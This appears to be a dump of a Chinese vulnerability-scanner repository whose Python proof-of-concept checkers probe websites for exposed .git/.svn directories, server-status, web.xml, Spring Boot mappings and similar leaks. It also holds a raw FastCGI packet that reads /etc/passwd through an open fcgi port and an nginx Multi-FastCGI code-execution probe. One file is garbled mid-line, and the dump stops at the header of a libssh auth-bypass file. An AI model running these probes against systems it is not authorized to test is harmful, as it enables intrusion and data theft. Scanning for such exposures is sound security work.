/POC_Scan/information/__pycache__/svn_check.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/information/__pycache__/svn_check.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/information/apache_server_status_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: apache server-status信息泄露
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: apache的状态信息文件泄露。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class apache_server_status_disclosure_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/server-status"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"Server uptime" in req.text and r"Server Status" in req.text and req.status_code==200:
27 |                 cprint("[+]存在apache server-status信息泄露...(低危)\tpayload: "+vulnurl, "green")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在apache_server_status_disclosure漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = apache_server_status_disclosure_BaseVerify(sys.argv[1])
39 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/information/crossdomain_find.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: crossdomain.xml文件发现
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: crossdomain错误配置可导致。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class crossdomain_find_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/crossdomain.xml"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"" in req.text and r"allow-access-from" in req.text:
27 |                 cprint("[+]存在crossdomain.xml文件发现漏洞...(信息)\tpayload: "+vulnurl, "green")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在crossdomain_find漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = crossdomain_find_BaseVerify(sys.argv[1])
39 |     testVuln.run()
40 | 


--------------------------------------------------------------------------------
/POC_Scan/information/git_check.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: git源码泄露扫描
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: 忘记了删除.git目录而导致的漏洞。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class git_check_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/.git/config"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"repositoryformatversion" in req.text and req.status_code==200:
27 |                 cprint("[+]存在git源码泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在git_check漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = git_check_BaseVerify(sys.argv[1])
39 |     testVuln.run()
40 | 


--------------------------------------------------------------------------------
/POC_Scan/information/informationmain.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | 
 4 | '''
 5 | name: information漏洞库
 6 | referer: unknow
 7 | author: Lucifer
 8 | description: 包含所有information漏洞类型,封装成一个模块
 9 | '''
10 | 
11 | from POC_Scan.information.springboot_api import springboot_api_BaseVerify
12 | from POC_Scan.information.options_method import options_method_BaseVerify
13 | from POC_Scan.information.robots_find import robots_find_BaseVerify
14 | from POC_Scan.information.git_check import git_check_BaseVerify
15 | from POC_Scan.information.jsp_conf_find import jsp_conf_find_BaseVerify
16 | from POC_Scan.information.svn_check import svn_check_BaseVerify
17 | from POC_Scan.information.jetbrains_ide_workspace_disclosure import jetbrains_ide_workspace_disclosure_BaseVerify
18 | from POC_Scan.information.apache_server_status_disclosure import apache_server_status_disclosure_BaseVerify
19 | from POC_Scan.information.crossdomain_find import crossdomain_find_BaseVerify
20 | 


--------------------------------------------------------------------------------
/POC_Scan/information/jetbrains_ide_workspace_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: JetBrains IDE workspace.xml文件泄露
 5 | referer: http://www.ab156.com/vul/view/vulid/3631.html
 6 | author: Lucifer
 7 | description: 网站存在JetBrains系列IDE的工作区文件,可以泄露整个工程的目录结构信息。通过下载workspace.xml,可直接获取整个工程的目录结构,发现敏感文件,为渗透中收集信息、发现漏洞提供了极大的便利。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class jetbrains_ide_workspace_disclosure_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/.idea/workspace.xml"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"可能不存在漏洞", "cyan")
34 | 
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = jetbrains_ide_workspace_disclosure_BaseVerify(sys.argv[1])
39 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/information/jsp_conf_find.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: java配置文件文件发现
 5 | referer: unknow
 6 | author: Lucifer
 7 | description: web.xml是java框架使用的配置文件,可以获取敏感信息
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class jsp_conf_find_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         payload = "/WEB-INF/web.xml"
20 |         vulnurl = self.url + payload
21 |         try:
22 |             req = requests.get(vulnurl, timeout=10, verify=False)
23 |             if req.headers["Content-Type"] == "application/xml":
24 |                 cprint("[+]存在web.xml配置文件...(敏感信息)\tpayload: "+vulnurl, "green")
25 |                 return True
26 |             else:
27 |                 cprint("[-]不存在jsp_conf_find漏洞", "white", "on_grey")
28 | 
29 |         except:
30 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
31 | 
32 | 
33 | if __name__ == "__main__":
34 |     warnings.filterwarnings("ignore")
35 |     testVuln = jsp_conf_find_BaseVerify(sys.argv[1])
36 |     testVuln.run()
37 | 


--------------------------------------------------------------------------------
/POC_Scan/information/options_method.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: options方法开启
 5 | referer: unknow
 6 | author: Lucifer
 7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class options_method_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         vulnurl = self.url
23 |         try:
24 |             req = requests.options(vulnurl, headers=headers, timeout=10, verify=False)
25 | 
26 |             if r"OPTIONS" in req.headers['Allow']:
27 |                 cprint("[+]存在options方法开启...(敏感信息)"+"\tpayload: "+vulnurl+"\tAllow:"+req.headers['Allow'], "green")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在options_method漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | 
36 | if __name__ == "__main__":
37 |     warnings.filterwarnings("ignore")
38 |     testVuln = options_method_BaseVerify(sys.argv[1])
39 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/information/robots_find.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: robots文件发现
 5 | referer: unknow
 6 | author: Lucifer
 7 | description: robots.txt是爬虫标准文件,可从文件里找到屏蔽了哪些爬虫搜索的目录
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class robots_find_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         payload = "/robots.txt"
20 |         vulnurl = self.url + payload
21 |         try:
22 |             req = requests.get(vulnurl, timeout=10, verify=False)
23 | 
24 |             if "Disallow" in req.text:
25 |                 cprint("[+]存在robots.txt爬虫文件...(敏感信息)"+"\tpayload: "+vulnurl, "green")
26 |                 return True
27 |             else:
28 |                 cprint("[-]不存在robots_find漏洞", "white", "on_grey")
29 | 
30 |         except:
31 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
32 | 
33 | if __name__ == "__main__":
34 |     warnings.filterwarnings("ignore")
35 |     testVuln = robots_find_BaseVerify(sys.argv[1])
36 |     testVuln.run()
37 | 


--------------------------------------------------------------------------------
/POC_Scan/information/springboot_api.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: spring boot 路径泄露
 5 | referer: http://blog.csdn.net/u011687186/article/details/73457498
 6 | author: Lucifer
 7 | description: SpringBoot默认API会暴露出敏感接口
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class springboot_api_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         payload = "/mappings"
20 |         vulnurl = self.url + payload
21 |         try:
22 |             req = requests.get(vulnurl, timeout=10, verify=False)
23 | 
24 |             if "resourceHandlerMapping" in req.text and r"springframework.boot.actuate" in req.text:
25 |                 cprint("[+]存在spring boot api路径泄露...(敏感信息)"+"\tpayload: "+vulnurl, "green")
26 |                 return True
27 |             else:
28 |                 cprint("[-]不存在springboot_api漏洞", "white", "on_grey")
29 | 
30 |         except:
31 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
32 | 
33 | 
34 | if __name__ == "__main__":
35 |     warnings.filterwarnings("ignore")
36 |     testVuln = springboot_api_BaseVerify(sys.argv[1])
37 |     testVuln.run()
38 | 


--------------------------------------------------------------------------------
/POC_Scan/information/svn_check.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: svn源码泄露扫描
 5 | referer: unknown
 6 | author: Lucifer
 7 | description: 忘记了删除.svn目录而导致的漏洞。
 8 | '''
 9 | import re
10 | import sys
11 | import requests
12 | import warnings
13 | from termcolor import cprint
14 | 
15 | class svn_check_BaseVerify:
16 |     def __init__(self, url):
17 |         self.url = url
18 | 
19 |     def run(self):
20 |         headers = {
21 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
22 |         }
23 |         payload = "/.svn/entries"
24 |         vulnurl = self.url + payload
25 |         try:
26 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False, allow_redirects=False)
27 |             try:
28 |                 contents = str(req.text).split('\x0c')
29 |                 pattern = re.compile(r'has-props|file|dir')
30 |                 for content in contents:
31 |                     match = len(pattern.search(content).group(0))
32 |                     if req.status_code == 200 and match > 0:
33 |                         cprint("[+]存在svn源码泄露漏洞...(高危)\tpayload: "+vulnurl, "red")
34 |                         return True
35 |                         break
36 |                     else:
37 |                         cprint("[-]不存在svn_check漏洞", "white", "on_grey")
38 |             except:
39 |                 cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
40 | 
41 |         except:
42 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
43 | 
44 | 
45 | if __name__ == "__main__":
46 |     warnings.filterwarnings("ignore")
47 |     testVuln = svn_check_BaseVerify(sys.argv[1])
48 |     testVuln.run()
49 | 


--------------------------------------------------------------------------------
/POC_Scan/system/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/systemmain.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/systemmain.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/__pycache__/systemmain.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/__pycache__/systemmain.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/iis/__pycache__/iis_webdav_rce.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/nginx/__pycache__/multi_fastcgi_code_exec.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/nginx/multi_fastcgi_code_exec.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: nginx Multi-FastCGI Code Execution
 5 | referer: http://drops.wooyun.org/tips/2006
 6 | author: Lucifer,xiaokv
 7 | description: nginx解析漏洞,代码执行
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from bs4 import BeautifulSoup
13 | from termcolor import cprint
14 | 
15 | class multi_fastcgi_code_exec_BaseVerify:
16 |     def __init__(self, url):
17 |         self.url = url
18 | 
19 |     def catch(self, url):
20 |         static_url = []
21 |         robots_url = url + "/robots.txt"
22 |         req = requests.get(robots_url, timeout=10, verify=False)
23 |         if req.status_code == 200 and r"Disallow" in req.text:
24 |             static_url.append(robots_url)
25 |             return static_url
26 | 
27 |         else:
28 |             req = requests.get(url, timeout=10, verify=False)
29 |             soup = BeautifulSoup(req.text, "html.parser")
30 |             try:
31 |                 imgs = soup.find_all("img")
32 |                 csss = soup.find_all("link")
33 |                 jss = soup.find_all("script")
34 | 
35 |                 for img in imgs:
36 |                     static_url.append(img["src"])
37 |                 for css in csss:
38 |                     static_url.append(css["src"])
39 |                 for js in jss:
40 |                     static_url.append(js["href"])
41 | 
42 |             except:
43 |                 pass
44 |             return static_url
45 | 
46 |     def run(self):
47 |         payload = "/a.php"
48 |         try:
49 |             turl = self.catch(self.url)
50 |             if len(turl) != 1:
51 |                 for rurl in turl:
52 |                     if r"http" not in self.url or r"https" not in self.url: 
53 |                         rurl = self.url + "/" + rurl 
54 |                     vulnurl = rurl + payload
55 |                     html = requests.get(rurl, timeout=10, verify=False)
56 |                     poc = requests.get(vulnurl + payload, timeout=10, verify=False)
57 |                     if html.headers["Content-Type"] != poc.headers["Content-Type"]:
58 |                         cprint("[+]存在Nginx Multi-FastCGI Code Execution漏洞...(高危)\tpayload: "+vulnurl+"\t老大去找上传点吧~", "red")
59 |                         break
60 |             else:
61 |                 rurl = ''.join(turl)
62 |                 vulnurl = rurl + payload
63 |                 html = requests.get(rurl, timeout=10, verify=False)
64 |                 poc = requests.get(vulnurl + payload, timeout=10, verify=False)
65 |                 if html.headers["Content-Type"] != poc.headers["Content-Type"]:
66 |                     cprint("[+]存在Nginx Multi-FastCGI Code Execution漏洞...(高危)\tpayload: "+vulnurl+"\t老大去找上传点吧~", "red")
67 |                     return True
68 |                 else:
69 |                     cprint("[-]不存在multi_fastcgi_code_exec漏洞", "white", "on_grey")
70 | 
71 |         except:
72 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
73 | 
74 | if __name__ == "__main__":
75 |     warnings.filterwarnings("ignore")
76 |     testVuln = multi_fastcgi_code_exec_BaseVerify(sys.argv[1])
77 |     testVuln.run()
78 | 


--------------------------------------------------------------------------------
/POC_Scan/system/php/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_expose_disclosure.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/php/__pycache__/php_fastcgi_read.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/php/php_expose_disclosure.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: php expose_php模块开启
 5 | referer: http://blog.csdn.net/change518/article/details/39892449
 6 | author: Lucifer
 7 | description: 开启了expose_php模块。
 8 | '''
 9 | import sys
10 | import requests
11 | import warnings
12 | from termcolor import cprint
13 | 
14 | class php_expose_disclosure_BaseVerify:
15 |     def __init__(self, url):
16 |         self.url = url
17 | 
18 |     def run(self):
19 |         headers = {
20 |             "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
21 |         }
22 |         payload = "/index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000"
23 |         vulnurl = self.url + payload
24 |         try:
25 |             req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
26 |             if r"XMLWriter" in req.text and r"phpinfo" in req.text:
27 |                 cprint("[+]存在php expose_php模块开启...(信息)\tpayload: "+vulnurl, "green")
28 |                 return True
29 |             else:
30 |                 cprint("[-]不存在php_expose_disclosure漏洞", "white", "on_grey")
31 | 
32 |         except:
33 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
34 | 
35 | if __name__ == "__main__":
36 |     warnings.filterwarnings("ignore")
37 |     testVuln = php_expose_disclosure_BaseVerify(sys.argv[1])
38 |     testVuln.run()


--------------------------------------------------------------------------------
/POC_Scan/system/php/php_fastcgi_read.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: php fastcgi任意文件读取漏洞
 5 | referer: http://blog.sina.com.cn/s/blog_777f9dbb0102vadk.html
 6 | author: Lucifer
 7 | description: webserver为了提供fastcgi一些参数,每次转发请求的时候,会通过FASTCGI_PARAMS的包向fcgi进程进行传递。
 8 |             本来这些参数是用户不可控的,但是既然这个fcgi对外开放,那么也就说明我们可以通过设定这些参数,来让我们去做一些原本做不到的事情。
 9 | '''
10 | import sys
11 | import socket
12 | import warnings
13 | from termcolor import cprint
14 | from urllib.parse import urlparse
15 | 
16 | class php_fastcgi_read_BaseVerify:
17 |     def __init__(self, url):
18 |         self.url = url
19 | 
20 |     def run(self):
21 |         port = 9000
22 |         if r"http" in self.url:
23 |             #提取host
24 |             host = urlparse(self.url)[1]
25 |             try:
26 |                 port = int(host.split(':')[1])
27 |             except:
28 |                 pass
29 |             flag = host.find(":")
30 |             if flag != -1:
31 |                 host = host[:flag]
32 |         else:
33 |             if self.url.find(":") >= 0:
34 |                 host = self.url.split(":")[0]
35 |                 port = int(self.url.split(":")[1])
36 |             else:
37 |                 host = self.url
38 | 
39 |         sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
40 |         sock.settimeout(6.0)
41 |         try:
42 |             sock.connect((host, port))
43 |             data = b"""
44 |                 01 01 00 01 00 08 00 00  00 01 00 00 00 00 00 00
45 |                 01 04 00 01 00 8f 01 00  0e 03 52 45 51 55 45 53 
46 |                 54 5f 4d 45 54 48 4f 44  47 45 54 0f 08 53 45 52 
47 |                 56 45 52 5f 50 52 4f 54  4f 43 4f 4c 48 54 54 50 
48 |                 2f 31 2e 31 0d 01 44 4f  43 55 4d 45 4e 54 5f 52
49 |                 4f 4f 54 2f 0b 09 52 45  4d 4f 54 45 5f 41 44 44
50 |                 52 31 32 37 2e 30 2e 30  2e 31 0f 0b 53 43 52 49 
51 |                 50 54 5f 46 49 4c 45 4e  41 4d 45 2f 65 74 63 2f 
52 |                 70 61 73 73 77 64 0f 10  53 45 52 56 45 52 5f 53
53 |                 4f 46 54 57 41 52 45 67  6f 20 2f 20 66 63 67 69
54 |                 63 6c 69 65 6e 74 20 00  01 04 00 01 00 00 00 00
55 |             """
56 |             data_s = ''
57 |             for _ in data.split():
58 |                 data_s += chr(int(_,16))
59 |             sock.send(data_s)
60 |             ret = sock.recv(1024).decode()
61 |             if ret.find("root:") > 0 and ret.find("/bin/bash") > 0:
62 |                 cprint("[+]存在php fastcgi任意文件读取漏洞漏洞...(高危)\tpayload: "+host+":"+str(port), "red")
63 |                 return True
64 | 
65 |             else:
66 |                 cprint("[-]不存在php_fastcgi_read漏洞", "white", "on_grey")
67 | 
68 |         except:
69 |             cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
70 |         sock.close()
71 | 
72 | if __name__ == "__main__":
73 |     warnings.filterwarnings("ignore")
74 |     testVuln = php_fastcgi_read_BaseVerify(sys.argv[1])
75 |     testVuln.run()
76 | 


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__init__.py


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/__init__.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/__init__.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/__init__.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/__init__.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-37.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-37.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/675354981/JR-scan/42ad770f8cc30846b99f6ae3cd5dc262de03fbdc/POC_Scan/system/ssh/__pycache__/libssh_bypass_auth.cpython-38.pyc


--------------------------------------------------------------------------------
/POC_Scan/system/ssh/libssh_bypass_auth.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | # -*- coding: utf-8 -*-
 3 | '''
 4 | name: libssh身份绕过漏洞(CVE-2018-10933)
 5 | referer: https://www.anquanke.com/post/id/162225
 6 | author: from https://github.com/blacknbunny/libSSH-Authentication-Bypass
 7 | env source:https://github.com/vulhub/vulhub/blob/master/libssh/CVE-2018-10933/README.zh-cn.md
